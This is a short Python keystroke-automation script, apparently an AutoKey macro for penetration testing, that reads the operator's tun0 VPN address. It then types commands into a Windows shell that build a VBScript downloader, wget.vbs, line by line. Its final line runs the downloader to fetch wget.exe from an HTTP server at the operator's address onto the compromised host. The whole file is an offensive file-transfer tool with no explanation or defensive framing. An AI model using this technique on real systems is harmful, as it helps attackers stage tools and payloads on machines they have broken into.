import netifaces as ni


try:
  ni.ifaddresses('tun0')
  tun_ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr']

except ValueError:
  dialog.info_dialog('tun0 not found', 'Can not obtain tun0 IP. Is the device connected?')

else:
    keyboard.send_keys('echo strUrl = WScript.Arguments.Item(0) > wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo StrFile = WScript.Arguments.Item(1) >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo Err.Clear >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo Set http = Nothing >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo http.Open "GET",strURL,False >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo http.Send >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo varByteArray = http.ResponseBody >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo Set http = Nothing >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo strData = "" >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo strBuffer = "" >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo Next >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys('echo ts.Close >> wget.vbs')
    keyboard.send_keys("<enter>")
    keyboard.send_keys("cscript wget.vbs http://" + tun_ip + "/wget.exe wget.exe")